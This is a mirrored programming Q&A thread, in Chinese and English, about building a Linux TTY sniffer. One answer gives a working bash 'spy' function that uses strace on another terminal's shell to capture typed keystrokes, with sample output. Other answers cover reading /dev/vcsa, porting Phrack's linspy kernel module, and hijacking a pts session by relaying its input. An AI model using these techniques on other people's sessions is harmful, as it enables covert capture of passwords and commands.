当前位置: 文江博客话题详情

我该如何编写 Linux TTY 嗅探器?

发布于 2024-08-29 08:31:31 字数 406 浏览 10 评论 0原文

出于教育目的(并不是说任何人都应该关心这种练习背后的动机),我想编写一个可以从备用 ttys/ptys 读取/写入的程序。我读过论文(来自 20 世纪 90 年代)但不能采用他们在现代 Linux/glibc 上使用的实现

我希望有人在过去研究过这个(过去不太远),或者至少阅读他们可以提供的与之相关的文档,这将进一步启发我。

我还想知道(考虑到 Linux 没有流)这个练习是否必须通过可加载内核模块 [lkm] 来完成。

我有很多问题,并且可能对一些允许实现这些目标的基本意识形态存在误解,有人可以帮忙吗? :)

原文

For educational purposes (not that anyone should care about the motivations behind such an exercise) I'd like to write a program that can read/write to/from alternate ttys/ptys. I've read papers (from the 1990s) but can't employ the implementation they use on modern Linux/glibc

I was hoping that someone had researched into this in the past (not too far in the past), or at least, read documentation pertaining to it, that they could provide, that would enlighten me further.

I also wonder if (considering the fact that Linux doesn't have streams) if this exercise must be done via a loadable kernel module [lkm].

I have many questions and probably a misunderstanding of some of the fundamental ideologies that allow such objectives to be put in place, could someone help? :)

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

吹梦到西洲 2024-09-05 08:31:31
function spy() {
    ptsnum=`ps awfux | grep pt[s]\/"$1" | awk '/bas[h]/{print $2}'` ;
    /usr/bin/strace -s 1000 -t -f -p $ptsnum 2>&1 3>&1 \
    | grep -Poi 'write(...\"[[:print:]]{1,2}\"[.][.][.][,]..)' ;
}

[436] klikevil@epiphany ~ $ w

    09:36:43 up 12:06,  6 users,  load average: 0.46, 0.29, 0.20
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

    klikevil pts/0    75.125.126.8     23:05    2:19m 10:33   0.18s cmd
    klikevil pts/1    75.125.126.8     00:18    6:50m  0.06s  0.04s sshd: klikevil [priv]
    klikevil tty7     :0               09:02   17:07m  2:02   0.32s x-session-manager
    klikevil pts/2    :0.0             09:03    3:30   0.08s  0.08s bash
    klikevil pts/3    :0.0             09:03    0.00s  0.76s  0.00s w
    klikevil pts/4    :0.0             09:06    3:13   0.46s  0.00s /bin/sh /usr/bin/thunder


[437] klikevil@epiphany ~ $ spy 2
write(2, "e"..., 1)
write(2, "c"..., 1)

write(2, "h"..., 1)
write(2, "o"..., 1)
write(2, " "..., 1)
write(2, "s"..., 1)
write(2, "u"..., 1)
write(2, "p"..., 1)
write(2, " "..., 1)
write(2, "d"..., 1)
write(2, "o"..., 1)

write(2, "g"..., 1)
write(2, "\n"..., 1)
^C

如果您不介意对一堆换行符进行排序,似乎效果很好。至于 TTY .. tail -f /dev/vcsa1-6

Jessica

function spy() {
    ptsnum=`ps awfux | grep pt[s]\/"$1" | awk '/bas[h]/{print $2}'` ;
    /usr/bin/strace -s 1000 -t -f -p $ptsnum 2>&1 3>&1 \
    | grep -Poi 'write(...\"[[:print:]]{1,2}\"[.][.][.][,]..)' ;
}

[436] klikevil@epiphany ~ $ w

    09:36:43 up 12:06,  6 users,  load average: 0.46, 0.29, 0.20
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

    klikevil pts/0    75.125.126.8     23:05    2:19m 10:33   0.18s cmd
    klikevil pts/1    75.125.126.8     00:18    6:50m  0.06s  0.04s sshd: klikevil [priv]
    klikevil tty7     :0               09:02   17:07m  2:02   0.32s x-session-manager
    klikevil pts/2    :0.0             09:03    3:30   0.08s  0.08s bash
    klikevil pts/3    :0.0             09:03    0.00s  0.76s  0.00s w
    klikevil pts/4    :0.0             09:06    3:13   0.46s  0.00s /bin/sh /usr/bin/thunder


[437] klikevil@epiphany ~ $ spy 2
write(2, "e"..., 1)
write(2, "c"..., 1)

write(2, "h"..., 1)
write(2, "o"..., 1)
write(2, " "..., 1)
write(2, "s"..., 1)
write(2, "u"..., 1)
write(2, "p"..., 1)
write(2, " "..., 1)
write(2, "d"..., 1)
write(2, "o"..., 1)

write(2, "g"..., 1)
write(2, "\n"..., 1)
^C

Seems to work pretty well if you don't mind sorting through a bunch of line breaks. As for the TTYs.. tail -f /dev/vcsa1-6

Jessica

回复 原文
烟花肆意 2024-09-05 08:31:31

Phrack 文章中的 linspy.c 代码是一个 Linux 内核模块。它不会针对现代内核进行编译,因为内部内核接口经常更改。

然而,它使用的基本方法是合理的(尽管它完全缺少 SMP 环境中正确性所需的锁定),并且通过应用足够的苦力,您应该能够将其移植到针对最新内核进行编译。

The linspy.c code in that Phrack article is a Linux kernel module. It won't compile against a modern kernel, because the internal kernel interfaces change frequently.

However, the basic approach it uses is sound (although it is completely missing locking required for correctness in an SMP environment), and with the application of sufficient elbow grease you should be able to port it to compile against the latest kernel.

回复 原文
甜是你 2024-09-05 08:31:31

我两次通过 ssh 进入远程 Linux 机器,生成 /dev/pts/0 和 /dev/pts/1。从 0 开始,我可以打开 1 进行读取,从而窃取用户输入到 1 的所有内容。如果我希望他们看到他们的输入,我必须将其写回 /dev/pts/1。当然,他们的输入永远不会到达他们的 shell,所以我必须在我的末端(在 0 上)创建一个 shell 进程,并将其输入通过管道传输,然后将 shell 输出回 1。

这对我来说非常有用。当这一切发生时,我可以在任何我喜欢的地方保存在此过程中读取和写入的所有数据。

当然,除非您是 root 或正在窥探您拥有的会话,否则您无法执行此操作,但您只想将此用于教育目的,对吧?

I'm ssh'd into a remote linux box twice, producing /dev/pts/0 and /dev/pts/1. From 0, I can open 1 for read, thereby stealing all the stuff the user types to 1. If I want them to see their typing, I have to write it back to /dev/pts/1. Of course, their input never makes it to their shell, so I have to create a shell process at my end (on 0) and pipe their input it, then pipe the shell's out back to 1.

This all works great for me. While all this is going on, I can save off all the data read and written during the process wherever I like.

Of course, you can't do this unless you are root or are snooping on a session you own, but you only wanted this for educational purposes, right?

回复 原文
~没有更多了~

关于作者

只有影子陪我不离不弃

暂无简介

0 文章
0 评论
23 人气
发私信

相关话题

更多

热门标签

操作系统 程序设计 IT运维 Linux系统管理 JavaScript 服务器应用 solaris C/C++ PHP Shell BSD Vue.js aix Oracle Python HTML 系统管理 HTML5 CSS 前端
更多

推荐作者

胡图图

文章 0 评论 0

zt006

文章 0 评论 0

z祗昰~

文章 0 评论 0

冰葑

文章 0 评论 0

野の

文章 0 评论 0

天空

文章 0 评论 0

更多

友情链接

文江博客
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文